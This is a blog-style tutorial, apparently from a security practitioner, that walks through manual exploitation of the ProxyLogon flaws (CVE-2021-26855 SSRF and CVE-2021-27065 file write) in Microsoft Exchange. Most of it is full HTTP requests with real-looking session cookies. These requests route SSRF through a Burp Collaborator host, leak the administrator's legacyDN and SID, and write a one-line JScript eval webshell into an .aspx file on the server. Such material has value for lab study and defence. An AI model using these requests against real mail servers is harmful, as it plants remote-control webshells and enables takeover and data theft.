ProxyLogon Utilization method (Manual use)

Some of the words

Having written a previous article on successful exploits, in order to figure out what was wrong with the locally built environment that didn't work, let's dive into the relevant data packages and principles again

Note: There are some problems with the online exp, and the script needs to be modified twice to ensure the success of using it. For example, the following script output is displayed

Introduction

It is known that the project mainly uses two vulnerabilities to obtain permissions, one SSRF and one file write

Cve-2021-26855 SSRF, the problem occurs when the client request is proxied to the server, the vulnerability can obtain the user's SID, the most important step in the non-interactive attack chain

Cve-2021-27065 File writing, Although the content to be written cannot be completely controlled, the file name and path can be set arbitrarily. When.aspx is written to a file, a Trojan horse can be inserted into the file to achieve remote control

The process is as follows

Actual use

CVE-2021–26855-SSRF

GET /owa/auth/yyyyyy.js HTTP/1.1
Host: mail.yangsir.git
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://mail.yangsir.git/owa/auth/logon.aspx?url=https%3a%2f%2fmail.yangsir.git%2fecp%2f%3fexsvurl%3d1%26p%3dVirtualDirectories&reason=0
Cookie: X-AnonResource=true; X-AnonResource-Backend=lg5vmst556l4ut5hg01cdlo6txzqnf.burpcollaborator.net/ecp/default.flt?~3
X-Forwarded-For: 8.8.8.8
Connection: close
Cache-Control: max-age=0

CVE-2021-27065-File writing

The OAB external URL writes Trojan content

POST /ecp/DDI/DDIService.svc/SetObject?ActivityCorrelationID=e9cf840e-e595-facd-3710-afbe2aad22a8&schema=OABVirtualDirectory&msExchEcpCanary=54aREH4XW064p9E_YOEzj0AzPh6oUNkIW6PI1a8ziUpOwNZMxxxhaQeRm8wzpYDo18aE9sIw1FY. HTTP/1.1
Host: mail.yangsir.git
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
X-Requested-With: XMLHttpRequest
Content-Type: application/json; charset=utf-8
Referer: https://mail.yangsir.git/ecp/VDirMgmt/EditOABVDir.aspx?pwmcid=5&ReturnObjectType=1&id=cde9e494-1dc4-4d03-898c-d00b04b9456f
Content-Length: 387
Cookie: X-BackEndCookie=S-1-5-21-2921479619-1120952621-1804897559-500=u56Lnp2ejJqBncfHnMjPzMvSysnOztLLmZyc0sfGzJzSys/PmcjMmsuezczJgYHNz83O0s/H0s3Jq8/NxcvMxc7N; msExchEcpCanary=54aREH4XW064p9E_YOEzj0AzPh6oUNkIW6PI1a8ziUpOwNZMxxxhaQeRm8wzpYDo18aE9sIw1FY.; PrivateComputer=true; ClientId=9C5BDFDA35A147F39F0E2590680F6ABC; X-OWA-JS-PSD=1; PBack=0; ASP.NET_SessionId=a69af73f-e5f2-4f51-9ad9-d978a9bbce96; TimeOffset=-480; Eac_CmdletLogging=false; SrvTrialChecked=true; cadata=06NwEfbphfaRV9ssqyInQlgydWqNPlQtZO3YxBSMwrRa+RalySU/CPAxhy/jqUEy8lAUDRG7wPwtheb4uiGnyiUjR15JHgzKgySIlRG9Azs=; cadataTTL=S4vlaLBame2nk4A/ae0yOg==; cadataKey=Debg0f+yPp6Dg8iiPU42hQ0EpTFD5Yrxj0aWXxSXl/Ta+eoraf3tAPoS7k6BPoQfjVSysCx2EcoYrShKfCT7bKAcpk1S4Kpj9U3NJgIazLSlnC/LHXmUpj02eNmqzUWoosJ90OVm6JqCrPSUkncZBJTBF7BSd7GuerZdW9/2PEPmUnkPOBGkAaGL6mR/QEL4mndw+koqTI0mkXixv/jrjJZomTOupgVS1sOiTkx1N8H19lhzcHHoNfvL+jFFP7ZMpCLkp0hKJUr++MBxNzu/zVieqggH2E5ZOpgEOB1w28uMFrMcTL9GCkOZU06i1jnHnqjgOZTDxwl//18LkjbE5w==; cadataIV=YCiLoW2R3fbX772qkkS+el/FDthDT6A9NOa7N9mChdEtY7U3qSxmkCDcO6GmUk8f6+O8UD3v3xVpFHOtsAR601tzFTGE9kZ399Mpnmf8atZYOLoehVJe8iD7b1NXu0MmQuZTpPNb84dn9lZZOqToffR8XDW2SEvBd7zk42CqoMwpcGUprhXDPdvXql6+tKZXviIuHd/uD8XW9N+KUFwvt2S3oI0sLU6aaKJQyiBOe52v3avwDOVQDR9vQmWdCnk+Z1wU+j7Cy/hsJ2edpWBI/2cwIQJSKhY3Q9YB0Y25/UWv2WaiCP3up90wE/ntrotTKwSiIxD9HsFSMcYsHy5rNg==; cadataSig=FmESD5gnVClB7HLgE81gQgjsXXQE6T3sg/aQ4K1gx199E16V5Owoqt2GZ26aikBGOUMUgyGy+MTrVrNWoTT6yh4G7Ax/RjahIXFZ8CBg+Ys7QZXP/zoCeR2jRQBGhNb/snHpPBb609i6Xabxsz2zf8ZIk5Z4Pq29oKBBSpQF5v8rE9Qy/9qkxwsejDh4i7+dl+gnXUXd5k51cIzZO7VfL+etT76/v6d3v1SabnY5gstaIn0kCsfAtyqQA7px3hm7i4puPa50ovFebpkkPcSfvErKlB+H4SLkJzBAJbBZaWgh2lC4sZpFeSG/MOfSLYuCE5Ccev70mK+VKeCFaM+2bQ==
X-Forwarded-For: 8.8.8.8
Connection: close

{"identity":{"__type":"Identity:ECP","DisplayName":"OAB (Default Web Site)","RawIdentity":"cde9e494-1dc4-4d03-898c-d00b04b9456f"},"properties":{"Parameters":{"__type":"JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel","ExternalUrl":"http://mytest/<script language=\"JScript\" runat=\"server\"> function Page_Load(){/**/eval(Request[\"code\"],\"unsafe\");}</script>"}}}

Mainly focus on ActivityCorrelationID, msExchEcpCanary, the latter use is very important

rest virtual dir

POST /ecp/DDI/DDIService.svc/SetObject?ActivityCorrelationID=06bd9c20-bcbb-e3bb-9501-9b4acca3cf39&schema=ResetOABVirtualDirectory&msExchEcpCanary=54aREH4XW064p9E_YOEzj0AzPh6oUNkIW6PI1a8ziUpOwNZMxxxhaQeRm8wzpYDo18aE9sIw1FY. HTTP/1.1
Host: mail.yangsir.git
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
X-Requested-With: XMLHttpRequest
Content-Type: application/json; charset=utf-8
Referer: https://mail.yangsir.git/ecp/VDirMgmt/ResetVirtualDirectory.aspx?pwmcid=8&ReturnObjectType=1&id=cde9e494-1dc4-4d03-898c-d00b04b9456f&schema=ResetOABVirtualDirectory
Content-Length: 321
Cookie: X-BackEndCookie=S-1-5-21-2921479619-1120952621-1804897559-500=u56Lnp2ejJqBncfHnMjPzMvSysnOztLLmZyc0sfGzJzSys/PmcjMmsuezczJgYHNz83O0s/H0s3Jq8/NxcvIxczL; msExchEcpCanary=54aREH4XW064p9E_YOEzj0AzPh6oUNkIW6PI1a8ziUpOwNZMxxxhaQeRm8wzpYDo18aE9sIw1FY.; PrivateComputer=true; ClientId=9C5BDFDA35A147F39F0E2590680F6ABC; X-OWA-JS-PSD=1; PBack=0; ASP.NET_SessionId=a69af73f-e5f2-4f51-9ad9-d978a9bbce96; TimeOffset=-480; Eac_CmdletLogging=false; SrvTrialChecked=true; cadata=06NwEfbphfaRV9ssqyInQlgydWqNPlQtZO3YxBSMwrRa+RalySU/CPAxhy/jqUEy8lAUDRG7wPwtheb4uiGnyiUjR15JHgzKgySIlRG9Azs=; cadataTTL=S4vlaLBame2nk4A/ae0yOg==; cadataKey=Debg0f+yPp6Dg8iiPU42hQ0EpTFD5Yrxj0aWXxSXl/Ta+eoraf3tAPoS7k6BPoQfjVSysCx2EcoYrShKfCT7bKAcpk1S4Kpj9U3NJgIazLSlnC/LHXmUpj02eNmqzUWoosJ90OVm6JqCrPSUkncZBJTBF7BSd7GuerZdW9/2PEPmUnkPOBGkAaGL6mR/QEL4mndw+koqTI0mkXixv/jrjJZomTOupgVS1sOiTkx1N8H19lhzcHHoNfvL+jFFP7ZMpCLkp0hKJUr++MBxNzu/zVieqggH2E5ZOpgEOB1w28uMFrMcTL9GCkOZU06i1jnHnqjgOZTDxwl//18LkjbE5w==; cadataIV=YCiLoW2R3fbX772qkkS+el/FDthDT6A9NOa7N9mChdEtY7U3qSxmkCDcO6GmUk8f6+O8UD3v3xVpFHOtsAR601tzFTGE9kZ399Mpnmf8atZYOLoehVJe8iD7b1NXu0MmQuZTpPNb84dn9lZZOqToffR8XDW2SEvBd7zk42CqoMwpcGUprhXDPdvXql6+tKZXviIuHd/uD8XW9N+KUFwvt2S3oI0sLU6aaKJQyiBOe52v3avwDOVQDR9vQmWdCnk+Z1wU+j7Cy/hsJ2edpWBI/2cwIQJSKhY3Q9YB0Y25/UWv2WaiCP3up90wE/ntrotTKwSiIxD9HsFSMcYsHy5rNg==; cadataSig=FmESD5gnVClB7HLgE81gQgjsXXQE6T3sg/aQ4K1gx199E16V5Owoqt2GZ26aikBGOUMUgyGy+MTrVrNWoTT6yh4G7Ax/RjahIXFZ8CBg+Ys7QZXP/zoCeR2jRQBGhNb/snHpPBb609i6Xabxsz2zf8ZIk5Z4Pq29oKBBSpQF5v8rE9Qy/9qkxwsejDh4i7+dl+gnXUXd5k51cIzZO7VfL+etT76/v6d3v1SabnY5gstaIn0kCsfAtyqQA7px3hm7i4puPa50ovFebpkkPcSfvErKlB+H4SLkJzBAJbBZaWgh2lC4sZpFeSG/MOfSLYuCE5Ccev70mK+VKeCFaM+2bQ==
X-Forwarded-For: 8.8.8.8
Connection: close

{"identity":{"__type":"Identity:ECP","DisplayName":"OAB (Default Web Site)","RawIdentity":"cde9e494-1dc4-4d03-898c-d00b04b9456f"},"properties":{"Parameters":{"__type":"JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel","FilePathName":"\\\\127.0.0.1\\c$\\inetpub\\wwwroot\\aspnet_client\\yangsir.aspx"}}}

confirm you are success

So far, high permission is required. To obtain the high permission email account, the SSRF obtains the information to perform file writing

Manual use according to exp

Get fqdn

The FQDN: YANGDC; you can be obtained from the return header x-feserver

Get legacydn

Use access to the FQDN, through access to the internal autodiscover/autodiscover SSRF. XML to obtain corresponding legacydn email accounts

POST /ecp/qqq.js HTTP/1.1
Host: yangsir
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36
ConTent-Type: text/xml
Cookie: X-BEResource=YANGDC/autodiscover/autodiscover.xml?a=~1942062522;
Content-Length: 343

<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006">
    <Request>
      <EMailAddress>administrator@yangsir.git</EMailAddress> <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema>
    </Request>
</Autodiscover>

Get sid

Request the /mapi/emsmdb interface by obtaining the legacyDN combination string, and make it report an error, and return the complete SID

string：\x00\x00\x00\x00\x00\xe4\x04\x00\x00\x09\x04\x00\x00\x09\x04\x00\x00\x00\x00\x00\x00

you can get sid like this

Get ASP.NET_SessionId&msExchEcpCanary (these two sessions are very important)

this use the proxyLogon interface，you will get these

File writing

Get oabid

Cookie: X-BEResource=Administrator@YANGDC:444/ecp/DDI/DDIService.svc/GetObject?schema=OABVirtualDirectory&msExchEcpCanary=OaGJzy--vU2R2T-d7WgnQKEIrHpkUtkIL2V05u5UZBIcJCZcsaybXdfRX6aM2wkavtBoAi8SbjY.&a=~1942062522; ASP.NET_SessionId=e6d5b949-c1a2-4e98-bb5a-65b57526110f; msExchEcpCanary=OaGJzy--vU2R2T-d7WgnQKEIrHpkUtkIL2V05u5UZBIcJCZcsaybXdfRX6aM2wkavtBoAi8SbjY.

{"filter": {"Parameters": {"SelectedView": "", "SelectedVDirType": "All", "__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel"}}, "sort": {}}

Change the dir config

The local environment cannot be modified successfully, so change the environment to demonstrate

Change the environment to modify the virtual directory configuration, ExternalUrl for our one-sentence Trojan

Reset the dir

confirm our webshell name

Success